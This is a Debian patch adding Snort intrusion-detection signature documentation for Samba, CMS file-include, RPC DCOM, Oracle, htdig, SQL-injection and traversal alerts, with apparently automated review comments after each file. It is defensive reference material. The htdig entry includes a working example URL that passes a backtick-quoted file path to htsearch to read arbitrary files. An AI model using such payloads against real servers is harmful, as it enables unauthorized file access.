Description: Signature documentation
This patch includes the documentation for different signatures
provided in the package.

Author: Javier Fernandez-Sanguino Peña <jfs@debian.org>
Origin: vendor
Last-Update: 2013-08-16


--- /dev/null
+++ b/doc/signatures/2972.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+536
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
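
Review bot: the file is named 2972.txt but the Sid field (`+536`) reads 536, so either the filename or the Sid is wrong; the two must agree or this documentation will be looked up under the wrong rule. In Attack Scenarios, 'Windows adminsitrative shares' should read 'administrative', and Additional References is left empty.
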
--- /dev/null
+++ b/doc/signatures/100000361.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000361
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "email_an_benutzer.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "email_an_benutzer.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
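
Review bot: the file opens with two blank lines before `+Rule:`, unlike the other files in this patch, which start at `Rule:`; drop them for consistency. In Detailed Information, 'running ona web server' should read 'running on a web server', and 'may indicate that an exploitation attempt has been attempted' in the Summary is redundant ('may indicate an exploitation attempt' suffices).
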
--- /dev/null
+++ b/doc/signatures/100000580.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000580
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_view.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_view.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
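
Review bot: many lines in this file carry trailing whitespace (e.g. `+This event is generated when an attempt is made to exploit a remote file `), and the `--` separators after the Sid, Affected Systems and Contributors sections lack the blank line used everywhere else in the patch; normalize both. 'running ona web server' in Detailed Information should read 'running on a web server'.
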
--- /dev/null
+++ b/doc/signatures/292.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 292
+
+--
+Summary:
+Versions of the file sharing software Samba 1.9.19 and prior contain a buffer overflow condition that can be exploited by supplying an overly long password to the Samba server.
+
+--
+Impact:
+System compromize presenting the attacker with the opportunity to
+gain remote access to the victim host or execute arbitrary code with the privileges of the user running the Samba server.
+
+--
+Detailed Information:
+Samba is used to share files and printers between hosts on a network. A buffer overflow in the handling of passwords exists such that an overly long password can trigger the vulnerability presenting the attacker with an opportunity to remotely compromise the server running the Samba software.
+
+Affected Systems:
+	Samba 1.9.19 and prior
+
+--
+Attack Scenarios:
+The attacker would need to supply an excessively long password.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Samba.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0182
+
+Bugtraq:
+http://www.securityfocus.com/bid/1816
+
+--
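
Review bot: the `--` separator is missing between the Detailed Information paragraph and `+Affected Systems:`, which breaks the section delimiting every other file in the patch relies on; add it. 'System compromize' in Impact should be 'System compromise', and `+Sid: 292` puts the value on the heading line whereas the other files place it on its own line.
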
--- /dev/null
+++ b/doc/signatures/3354.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3354
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
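
Review bot: the Attack Scenarios text ('a request for a file with an overly long filename via a network share') does not match the vulnerability described in Detailed Information, which is a malformed DCOM request sent over RPC that triggers a buffer overflow; the scenario should describe that RPC request path rather than a file-share access. 'Expoit code exists' in Ease of Attack should read 'Exploit code exists'.
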
--- /dev/null
+++ b/doc/signatures/1601.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+1601
+
+--
+Summary:
+This event is generated when an attempt is made to read a file on a host using a well known vulnerability in htdig.
+
+--
+Impact:
+Severe. Unauthorized file access
+
+--
+Detailed Information:
+Some versions of htdig allow inclusions to be made from configuration files as a parameter to the htsearch function. Any file can be included by enclosing it in single quotes ('foo').
+
+Using this vulnerability, any single quoted input string (`....`) is included as an index file by htsearch. This allows an attacker to read any file on the host.
+
+--
+Affected Systems:
+HTDig versions 3.1.1, 3.1.2, 3.1.3, 3.1.4 and 3.2.0b1
+
+--
+Attack Scenarios:
+A input form with a textbox named "Exclude" and http post action handled by htsearch or a url similar to http://www.foo.com/cgi-bin/htsearch?Exclude=%60/anyfile%60 can be used to access files on your host. %60 is the single quote caracter "`".
+
+--
+Ease of Attack:
+Simple. No exploit scripts required
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq:
+http://www.securityfocus.com/bid/1026
+
+--
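
Review bot: Detailed Information says files are included by enclosing them in single quotes ('foo'), but the next paragraph and the Attack Scenarios example use backticks (`....`, `%60`), and %60 is the backtick (grave accent) character shown in `"`"`, not the single quote; the text should consistently say backtick. Also 'A input form' should be 'An input form', 'caracter' should be 'character', and the `-- ` separator before Additional References carries trailing whitespace.
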
--- /dev/null
+++ b/doc/signatures/1145.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1145
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
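
Review bot: the Summary and Detailed Information never say which vulnerability or which web application rule 1145 matches ('a known vulnerability on a web server or a web application'), so a reader cannot tell what triggered the alert or judge the false positive rate; name the targeted resource the way the other web-server entries in this patch do (100000361.txt names both the script and the parameter). 'the attackers choosing' should read 'the attacker's choosing'.
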
--- /dev/null
+++ b/doc/signatures/1440.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1440
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
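
Review bot: the Corrective Action section is empty (`+Corrective Action:` is immediately followed by the `--` separator). Since Impact describes a policy violation and Detailed Information mentions client vulnerabilities, the section should at least point the reader to the applicable usage policy and to keeping the client software patched, or state explicitly that no action is required.
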
--- /dev/null
+++ b/doc/signatures/576.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+576
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) amountd (also known as autofsd) is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port amountd is using.  Attackers can also learn what versions of the amountd protocol are accepted by amountd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as amountd run.  The amountd RPC service is used by UNIX hosts to automatically mount and unmount autofs files.  It can use name service maps to find file systems to be mounted.  A vulnerability is present in autofsd that allows an attacker to execute arbitrary commands.  The attacker requests a map name that is executable, followed by a malformed client key and commands to be executed.  The server improperly interprets the input and executes the commands.
+
+--
+Affected Systems:
+IBM AIX 4.3, SGI IRIX 6.2, 6.3, 6.4, 6.5, and 6.5.1.
+
+--
+Attack Scenarios:
+An attacker can craft an amountd request that executes arbitrary commands on the remote file system. 
+
+--
+Ease of Attack:
+Easy.  Exploit code is widely available.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access amountd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for amountd, not probes of the amountd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the amountd service itself. An attacker may attempt to go directly to the amountd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/332/info/
+
+Arachnids:
+http://www.whitehats.com/info/IDS19
+
+
+--
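
Review bot: the Attack Scenarios line says the crafted request 'executes arbitrary commands on the remote file system', while Detailed Information describes command execution on the host running autofsd; 'on the remote host' is the accurate phrasing. Several sentences in this file use double spaces after periods, unlike the rest of the patch. The False Negatives paragraph, which explains that the rule sees only the portmapper GETPORT probe and not direct access to the amountd port, is the kind of coverage statement the other files should also carry.
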
--- /dev/null
+++ b/doc/signatures/2725.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2725
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_nchar
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
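
Review bot: in Detailed Information the procedure name is split across lines so the sentence reads `+vulnerability in the procedure add_priority_nchar` / `+. This procedure is included in` / `+dbms_repcat.`; rejoin it into one sentence. 'Oracle Oracle9i' under Affected Systems duplicates the vendor name, and several `-- ` separators carry trailing whitespace.
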
--- /dev/null
+++ b/doc/signatures/2697.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+2697
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter file.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
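
Review bot: `+vulnerability in the procedure alter file.` does not give a usable identifier: a two-word 'alter file' is not a procedure name, and the companion entry 2725.txt names both the procedure and its package; supply the exact procedure and package here as well. As in 2725.txt, 'Oracle Oracle9i' duplicates the vendor name and several `-- ` separators carry trailing whitespace.
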
--- /dev/null
+++ b/doc/signatures/2619.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2619
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "alter_master_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "type" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck634.html
+
+--
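
Review bot: the sentence `+If you are running Oracle on a Windows server, make sure that the` / `+variable $ORACLE_PORTS is set to a value of "any".` is rule configuration advice, not a description of the vulnerability, yet it sits in Detailed Information without saying that $ORACLE_PORTS is the rule's port variable; move it to its own paragraph that names it as such (or into Corrective Action) so a reader does not mistake it for an Oracle server setting. 'a Oracle database' in the Summary should read 'an Oracle database', and Affected Systems is indented with spaces where the other files use a tab.
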
--- /dev/null
+++ b/doc/signatures/1374.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+1374
+
+--
+Summary:
+Attempted .htgroup access via web
+
+--
+Impact:
+Attempt to gain information on group access permissions on a webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the user and administration groups used on a webserver. The .htgroup file lists the groups allowed to access resources on a webserver. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '.htgroup'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing viewing of this file via a URI is suggested. For Apache webservers add the following to httpd.conf and restart the server.
+
+<Files ~ "^\.ht">
+    Order allow,deny
+    Deny from all
+</Files>
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
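
Review bot: the Affected Systems section is missing entirely (Detailed Information is followed directly by `+Attack Scenarios:`), unlike every other entry in the patch; add it. In Attack Scenarios, `'.htgroup'in the URI` needs a space after the closing quote, and 'outside of it's designated web root' should read 'its'. Additional References is empty.
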
--- /dev/null
+++ b/doc/signatures/2542.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2542
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
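
Review bot: 'An attcker' in Attack Scenarios should be 'An attacker', and the Corrective Action sentence lacks its terminal period. The Affected Systems line `+	Microsoft Windows 2000, 2003 and XP systems using SSL` would be clearer as 'Windows Server 2003' so the edition is unambiguous.
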
--- /dev/null
+++ b/doc/signatures/100000696.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000696
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VCard PRO" application running on a webserver. Access to the file "create.php" with SQL commands being passed as the "card_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "card_id" parameter in the "create.php" script used by the "VCard PRO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VCard PRO
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
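
Review bot: Corrective Action only says to patch, yet Detailed Information attributes the issue to missing 'stringent input checks' on the card_id parameter; the section should also recommend validating that parameter and using parameterized database queries, which is what the cited 'SQL Injection Attack and Defense' reference covers. The file also opens with two blank lines before `+Rule:`, and 'running ona web server' should read 'running on a web server'.
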
--- /dev/null
+++ b/doc/signatures/1306.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1306
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
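
Review bot: Affected Systems is empty, and the Summary ('an attempt is made to execute a directory traversal attack') does not say which protocol or path pattern rule 1306 matches; Detailed Information lists web, web application and ftp servers while Attack Scenarios speaks only of 'the ftp root directory', so the rule's actual scope should be stated. The `-- ` separator before Additional References carries trailing whitespace and the references section is empty.
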
--- /dev/null
+++ b/doc/signatures/3336.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3336
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
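
Review bot: this file is word-for-word identical to 3354.txt apart from the Sid, so it carries the same defects: the Attack Scenarios text about 'an overly long filename via a network share' contradicts the malformed RPC DCOM request described above it, and 'Expoit' should be 'Exploit'. If rules 3336 and 3354 cover different aspects of the DCOM vulnerability, Detailed Information should say how they differ.
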
--- /dev/null
+++ b/doc/signatures/1272.txt
@@ -0,0 +1,71 @@
+Rule:  
+
+--
+
+Sid:
+1272
+
+--
+
+Summary:
+This event is generated when an attempt is made to probe a host for the
+sadmind RPC service.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Certain versions of sadmind on Solaris systems are vulnerable to a
+remotely exploitable buffer overflow condition. This event indicates
+that an attempt has been made to determine if the service is available
+on the target host.
+
+--
+Affected Systems:
+	Solaris 2.5 through 2.7
+ 
+--
+Attack Scenarios:
+An attacker runs an automated tool that connects to portmapper of the
+target host, probes for RPC, and repeatedly attacks the host to brute
+force the offset in the buffer overflow.
+
+--
+Ease of Attack:
+Simple. Tools are available and exploit code exists to exploit
+vulnerabilites in sadmind.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the sadmind service.
+
+Disallow access to RPC services from hosts external to the protected
+network
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by David Wilburn <bug@gecko.roadtoad.net>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
